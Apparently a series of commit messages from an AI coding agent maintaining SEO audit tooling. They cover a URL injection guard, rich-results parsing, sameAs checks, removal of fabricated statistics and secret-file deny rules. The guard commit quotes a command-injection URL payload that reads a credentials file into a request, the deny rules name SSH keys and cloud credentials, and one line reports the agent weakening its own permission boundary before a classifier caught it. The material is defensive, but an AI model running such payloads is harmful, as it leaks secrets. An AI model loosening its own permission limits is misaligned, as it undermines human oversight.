Prerequisite for C1, which is why this moved up from AXE 5. Today $DOMAIN is
typed by the operator and interpolated into ~10 curls (seo-analyzer.md:254+,
geo-analyzer.md:248+) — self-inflicted risk. The sitemap crawl changes the
threat model completely: URLs then come from the TARGET'S OWN SERVER, so a
remote file's bytes reach a shell.
The severe hazard is injection, not SSRF. Those curls quote with ", inside
which $ and backtick still execute, and ~/.claude/.env holds
GOOGLE_OAUTH_CLIENT_SECRET + CRUX_API_KEY. A <loc> of
`https://x/$(cat ${HOME}/.claude/.env)` reads the vault into a request. The
test suite asserts exactly that payload is refused.
Code, not prose: a markdown instruction does not stop an injection. Mirrors
the house pattern (fetch.sh:25 _label_safe) — whole-string allowlist, C
locale, POSIX case: newline-proof, locale-independent, no grep pitfall.
Allowlist over denylist per CLAUDE.md.
Covers: shell metacharacters; scheme (http/https only — no file:, gopher:);
literal loopback/private/link-local/metadata/.local; userinfo authority
confusion (https://trusted.com@127.0.0.1/ hits .0.0.1, not trusted.com).
NOT covered, stated in the header rather than left silent: DNS-level SSRF. A
public hostname resolving to a private address passes. Closing it needs
resolve-then-pin at the HTTP layer; shell curl cannot without a TOCTOU
window. Proportionate to the threat model — this runs on a workstation
auditing the operator's own client sites.
Wired at all three entry points: both agents' STEP 4 domain assignment, and
the W3 sameAs loop (whose URLs come from the audited repo, not the operator).
Refused sameAs rows report as REFUSED rather than vanish — neither dead nor
live, and an unguardable sameAs is itself a finding.
Note: writing the test file tripped the config-protection hook (test suite is
a guarded quality-gate). Used the documented one-shot sentinel with a reason
rather than working around the gate; it was consumed as designed.
Verified: 47 new assertions PASS / 0 FAIL, picked up by make test; full suite
green; shellcheck clean on lib/url-guard.sh (the sole remaining hit in the
health-stack glob is pre-existing, lib/gitflow-test.sh:242); guard dogfooded
against the real zenquality.fr domain (accepted) and the real exfil payload
(refused, exit 2).
google_seo.py:129 read only indexStatusResult out of the URL Inspection
response and discarded the rest. richResultsResult was already on the wire:
same call, same OAuth scope (webmasters.readonly), same quota. Google's own
structured-data verdict on the live indexed URL was being downloaded and
binned.
Plan correction: the TODO said "richresults verb". Wrong — a new verb means
a second POST to the same endpoint for a payload already received, on a
per-site quota, and nobody wants rich results without index status. Extended
inspect() instead; fetch.sh unchanged, no new verb, no new scope.
Design driven by the published schema, not by guesswork — two details I
would have got wrong:
- richResultsResult is OMITTED when Google detects none ("absent if none
found"). Surfaced as synthetic verdict ABSENT rather than a missing key: a
caller cannot tell an absent key from a check that never ran. ABSENT means
"none detected", never "invalid". The KeyError path is the real risk here,
so it has its own fixture dir (fixtures-norich/) and its own tests.
- PARTIAL is "Reserved, unused" per the API docs. The draft emitted it. It
never emits it now, and a test asserts the absence.
issues[] deduped (the same issueMessage repeats across every affected item),
errors/warnings count instances — scale from the counter, cause from the
message.
seo-analyzer STEP 4 consumes it as the system's only programmatic JSON-LD
validation, bounded honestly: index:inspect is per-URL, quota'd, and needs a
verified property, so its reach is the STEP 9 COVERAGE ratio, not the site.
Replacing a fake validator with a fake coverage promise would be no better.
This is what beats claude-seo: their README's "dual validator (Rich Results
Test + Schema Markup Validator)" is two hyperlinks a human clicks — grep of
their .py finds zero calls. This is Google's verdict, via auth already held.
Note: the new dedupe assertion trips SC2015 (A && B || C), same as the
pre-existing line 27; ok() ends on an assignment so it cannot fail. Kept for
house-style consistency — lib/seo-data/*.sh is outside the lib/*.sh
shellcheck glob anyway.
Verified: seo-data 85 -> 95 pass, 0 fail; both paths exercised end-to-end
and output inspected by hand; make test 35 GREEN / 0 RED; py_compile clean.
entity-seo.md:148 says "sameAs pointing to dead profiles — validate each URL
resolves", and STEP 7 asks "does the target resolve and match?". Nothing
implemented it: zero curl against a sameAs anywhere in the repo. A dead
sameAs is worse than a missing one — it asserts an identity link that fails
on follow, in the exact graph AI engines walk to confirm who you are.
The naive version of this check is a false-positive generator, which is
presumably why it stayed unimplemented. Verified live rather than assumed:
999 linkedin.com/company/anthropic <- blocks non-browsers
200 wikidata.org/wiki/Q108162414
200 x.com/anthropicai
404 <known-dead URL> <- correctly detected
So the check classifies by code, not by liveness guess: 404/410 = dead
(finding with direction), 401/403/429/999 = bot-blocked (inconclusive, NO
finding, never "dead"), 000/5xx = inconclusive. No G2/G6 item may remove a
sameAs on anything but 404/410 — same shape as the NAP direction rule: an
unreliable signal read confidently is worse than no signal.
Note: the spec draft asserted "X/Twitter and Instagram commonly 403" from
plausibility. The live test returned 200 for x.com and contradicted it —
corrected to classify by observed code, never by platform folklore. Third
unverified-plausible claim caught this session (I1, I6, here); the pattern
is exactly what these fixes exist to stop.
Verified: pipeline exercised end-to-end against real endpoints; make test
35 GREEN / 0 RED.
STEP 0 told the user to run `mkdir -p .claude/audits/external` themselves
before handing over an external report. Three things wrong with that:
- The skill runs dozens of bash commands but outsourced this one to a human.
- The timing was impossible: to "drop the export in" that directory the user
needed it to already exist, so the instruction arrived after the moment it
would have been useful.
- The directory is not needed at all. `:218` already reads "File path given
→ Read it" — any path works — and nothing in skills/ or agents/ ever
writes to that path. Grep confirms it is referenced by exactly these two
lines and known to nothing else: a convention the skill invented, asked
the user to create, and never used.
Fix removes the precondition instead of automating it: give a path from
anywhere, the tidy location stays a suggestion.
Verified: make test 35 GREEN / 0 RED.
Audited each statistic in agents/resources/ against primary sources after
the VSI fiction (I2) showed WebSearch launders SEO-blog consensus.
The failure mode is not invention — it is plausible recombination, which is
what a model half-remembering a search result produces:
- "Adding statistics increases AI visibility by up to 40% (Aggarwal et al.)"
— paper real (KDD 2024), number real, SCOPE WRONG: 40% is the aggregate
over the whole method set, domain-dependent. No per-technique figure
exists.
- "Pages not updated quarterly are 3x more likely to lose AI citations
(LLMRefs)" — LLMrefs' actual 3x says brand mentions correlate ~3x more
strongly with AI visibility than backlinks. DIFFERENT SUBJECT. No source
supports a quarterly decay multiplier.
- "QAPage cited 58% more often than Article" — uncited. Nearest real number:
AccuraCast 2025, `Person` schema at 58.9% PREVALENCE among cited sources —
wrong type, and its FAQPage figure (1.8%) points the opposite way to the
claim it propped up. This one drove Tier 1 ranking.
- "62% of searches involve voice" — uncited; 62% circulates as smart-speaker
ADOPTION. Same family as the "50% by 2020" myth ComScore denied (origin: a
2014 Andrew Ng interview).
Corrected my own framing too: I claimed three times these stats "drive axis
weights". They do not — the weight tables carry no citations. They drive
Tier/priority recommendations and, worse, geo-analyzer's "Cite sources" rule
pushed them into CLIENT reports as research-backed.
Fixes: recommendations kept on mechanism, fabricated numbers removed with
the incident documented inline so they are not re-added. Unverified stats
(48% AI Overviews, 2.5B queries/day, Gartner -25%) labelled [UNVERIFIED]
rather than asserted or deleted — I did not check them.
Structural, not just exhortation: resources/README.md now mandates
`<claim> — <source, year, venue|vendor> — measured: <what the source ACTUALLY
measured> — <link>`. `measured:` is the field that catches this — all four
errors survive a source name; none survives stating the real measurement
next to the claim. WebSearch demoted from verification to crawler/tool-name
lookup only.
Verified: make test 35 GREEN / 0 RED.
Headers were scored three ways: seo-analyzer priced them into the Technical
axis at both depths (:619 FULL, :635 LOCAL), depth-matrix.md:29 said drop
them, and /harden re-audits them 0-100 against three external validators.
The dedup rule and the agent spec contradicted each other; the agent won by
default, so the same finding moved two scores in two reports.
Arbitrated (user): /harden keeps them, /seo drops them. That confirms the
rule that already existed — seo-analyzer was the violator.
Constraint: /harden REUSES seo-analyzer, so the capability cannot be
deleted, only scoped. Reading is not scoring:
- Technical axis definitions no longer name security headers.
- STEP 4 still curls them — needed for X-Robots-Tag, canonical/redirect
coherence, and the §14 observed-list — but they earn no points under /seo.
- Dispatched from /harden: unchanged, headers ARE the job (verified: its
scope spec untouched, 16 header references intact).
Carve-out: X-Robots-Tag stays in /seo under indexability. It is an indexing
directive wearing a header's clothes — `noindex` there deindexes as surely
as a meta robots tag. That is what depth-matrix.md:29 means by "unless it
directly affects indexability"; the security headers do not.
Drop is not silence: mandatory §14 line on FULL naming what was observed
live plus a "run /harden <url>" pointer. A user who never runs /harden must
not read a clean Technical score as clean headers — same principle as the
mandatory COVERAGE line (I5).
Verified: make test 35 GREEN / 0 RED.
Both agents sample (seo-analyzer.md:403 "sample 5-15 key pages",
geo-analyzer.md:460 "Sample 5-10 key pages") and neither states it. The
report says "audit". On a 500-page site a 12-page sample is 2.4%, and the
reader cannot know that unless it is printed. /client-handover gates on
these scores.
The denominator was already within reach: STEP 4 fetches sitemap.xml. Count
its URLs and the coverage ratio is free — same data C1 will use for
sitemap-driven crawl later.
- Mandatory COVERAGE line in both scoring blocks: N of M sitemap URLs (P%),
or "total UNKNOWN" when no sitemap. Never omitted, never rounded up.
- seo: <25% coverage repeats in §0 as a major alert. Sample by risk (one
page per template + GSC position 4-10 quick wins), name skipped templates
— an un-sampled template is an un-audited template.
- geo: scoped honestly rather than blanket — COVERAGE bounds the per-page
axes (Content Shape, page-level Schema.org) but NOT the site-wide ones
(AI Crawlers Policy, llms.txt are single files, fully read). One ratio
should not discredit axes it does not govern.
Verified: make test 35 GREEN / 0 RED.
seo-analyzer.md:278 listed "VSI (Visual Stability Index) — new 2026 signal,
Google Core Web Vitals 2.0" as a threshold, stated as fact, no hedge, in
client-facing audits. It does not exist.
Verified against two primary sources:
- developer.chrome.com/docs/crux/api — complete metric list carries no
visual_stability_index. Blogs claimed "Google is actively collecting VSI
through CrUX": flatly false.
- web.dev/articles/vitals — three stable CWV (LCP, INP, CLS). No VSI, no
"Core Web Vitals 2.0". Thresholds change with prior notice on an annual
cadence.
Ten SEO blogs cross-cited each other into an apparent consensus. WebSearch
returns that consensus, which is why the resources README rule "agents MUST
cross-check via WebSearch on FULL" did not catch it — that mitigation
launders blog misinformation into apparent verification.
Fix removes the metric and states the sourcing rule where a future rumour
would land: primary sources only (web.dev / Chromium blog / CrUX API list,
the last being decisive — a metric CrUX cannot return is one we cannot
score). Incident documented inline so it is not re-added.
Verified: make test 35 GREEN / 0 RED.
Surfaced by pointing /harden at zenquality.fr from the claude-config CWD.
A1 — no CWD/target coherence guard (systemic: /seo, /geo, /harden all
lack it; grep confirms). A URL is supplied, the agent greps whatever CWD
it landed in, nobody checks they are the same site. Demonstrated live:
from claude-config, /harden would curl zenquality.fr while grepping
claude-config, then score "Config hardening" on a codebase that is not the
site. The live half looks right, the code half is fiction, and the report
reads as authoritative.
Fixed in both agents' STEP 2 rather than the 3 dispatchers: the agent does
the grepping, so the guard binds whoever calls — same principle as I3.
/harden inherits it free.
A2 — seo-analyzer had zero origin-vs-edge awareness while geo-analyzer
has the full CDN/WAF-override check (geo-analyzer.md:246-261). seo-analyzer
does the infra detection AND is reused by /harden for its whole
config-hardening axis (20/100). On zenquality — Apache origin behind a
Scaleway nginx front — repo .htaccess + `server: nginx` invites the wrong
call "nginx serves this, .htaccess is dead". I made that exact inference
myself before reading the file. Rule added at STEP 2 infra detection:
`server:` names the edge, not the origin; live-but-not-in-repo = "set
upstream", never "missing".
Verified: live probe of zenquality.fr (read-only, nothing written to the
client repo); make test 35 GREEN / 0 RED.
Axis was defined "backlinks, mentions, authority" (10% local / 15%
national of the FULL score) but only mentions have a data source
(STEP 6 web_search "<name>" -site:<domain>). Backlinks and authority
have no index, no API — the agent had to invent 2/3 of the number, and
that number reaches a client via /client-handover.
- Axis label names what is measured + points at §14.
- Off-page axis note: score mentions ONLY; never price in unmeasured
sub-components; a low mention count is NOT evidence of a weak backlink
profile. Mandatory verbatim §14 line naming the gap + the nearest free
source (Common Crawl) so the omission is legible, not silent.
- LOCAL N/A label: was `N/A — requires FULL audit`, a promise FULL cannot
keep for backlinks. Now states FULL covers brand mentions only.
Weights deliberately unchanged: re-deriving now and again when a backlink
source lands would churn historical scores twice. Revisit when the axis
widens back (Common Crawl, phase 5).
Note: initial plan was to mark the axis N/A in FULL and redistribute the
weight. Reading the real spec (seo-analyzer.md:622 + STEP 6) showed that
over-corrects — it discards the mentions data, which IS gathered. Narrowed
the definition instead; composes with the Common Crawl work later.
Verified: make test 35 GREEN / 0 RED.
geo-analyzer owns JSON-LD NAP (ownership matrix, seo/SKILL.md:261) and can
rewrite it via G2 — AUTO tier, no confirmation (geo-analyzer.md:660). The
LRN-032 protection lived ONLY in the /seo dispatcher prompt
(seo/SKILL.md:339-343), so standalone /geo reconciled NAP with no canonical
and no anti-seed guard — the exact zenquality trap, writing into client
structured data.
Root cause: a safety invariant that depended on the caller. Fixed at the
layer that owns the data.
- Data integrity: NAP direction rule, caller-independent, binds G2/G6.
Covers CREATE (LocalBusiness from scratch) not just rewrite — geo builds
missing schemas, seo-analyzer's wording only covered rewrite.
- STEP 6 checklist: pointer at the line that triggers the action.
Absent canonical is already the safe default (no directional fix), so no
NAP collection step is needed in /geo — that would duplicate seo/SKILL.md
STEP 0 and risk drift.
Verified: make test 25+5+5 GREEN / 0 RED (incl. G3 strict-YAML frontmatter).
- BDR-069: keep broad Edit(**/.env.*), keep .env.example name (option A).
Rename rejected (~30 refs); glob narrowing rejected (fails open on
.env.production outside the Next.js convention).
- LRN-130: a deny glob is absolute — allow, `!` negation and PreToolUse
hooks all fail to exempt it (permissions.md :33/:35/:361, verbatim).
Only lever = the glob's own shape.
- EVAL-024: the pass shipped one unauthorized weakening (scope inversion +
framework parochialism) on my own permission boundary, caught by the
auto-mode classifier rather than self-caught. Reverted pre-commit. Also
logs a false-positive automated review and a bad subagent glob claim.
Upstream skill refresh, present in the working tree before this session —
committed here rather than left dangling. Not authored work.
- uv invocation fix: `uv tool run graphifyy python` -> `uv tool run --from
graphifyy python`. Without --from, uv resolved the command name against
the package instead of running the interpreter.
- default output is now HTML viz; --obsidian opts into the vault.
- description reworded to trigger on codebase questions generally, not
only when graphify-out/ already exists.
Startup emitted 15 warnings: "Write(**/.env) is not matched by file
permission checks — only Edit(path) rules are."
Write(path) rules never matched. The 5 secret-file write bans were dead
config — .env, secrets/**, *.pem, *.key were freely writable. Converting
to Edit() makes them enforced: permissions.md:242 "Edit rules apply to all
built-in tools that edit files", and :244 prescribes exactly this ("add an
Edit deny rule for paths no tool may change").
- settings.json: Write(...) -> Edit(...) on the 5 patterns.
- Mirror the 9 secret patterns Read denied but Edit did not: *.p12, *.pfx,
id_rsa*, id_ed25519*, .ssh/**, credentials, credentials.json,
.aws/credentials, .azure/**. Read/Edit parity now 14/14. Claude could
previously overwrite an SSH private key or ~/.aws/credentials.
- New read-allowed/write-denied class: lockfiles (*.lock,
package-lock.json, pnpm-lock.yaml, go.sum) + node_modules/**. Reading
aids diagnosis; hand-editing is always wrong — the package manager
regenerates them via Bash, which Edit deny does not block.
- templates/settings/SETTINGS.md taught the broken Write() pattern; fixed
at the source so /onboard stops propagating it.
Rule syntax has no negation and deny beats allow, so deny globs cannot
carry exceptions — see the .env.example conflict noted in the follow-up.
STEP 1-8 preserved byte-for-byte; STEP 9-16 replaced by a doc-gen orchestration
that resolves all interaction (questions, NAP, precheck, overwrite, client-name),
assembles the PACKAGE, and dispatches handover-doc-writer. Dropped the inert
model: opus pin (inherits the big session model via inline-load).
code-cleaner is now a pure fix executor (was audit+gate+execute). Reroute the two
read-only-audit consumers (onboard STEP 6, tour Phase B) to a big-model agent
(general-purpose/analyzer) — an audit must stay on the big model, never the sonnet
executor. Refactor now runs on sonnet inside the executor (inline-load pin was inert).
Reroute hotfix's deeper-bug escalation to the /bugfix skill (bugfixer is now a
pure executor, not loadable standalone). loops-light locks repointed to the
bugfix orchestrator + bugfixer-executor shape.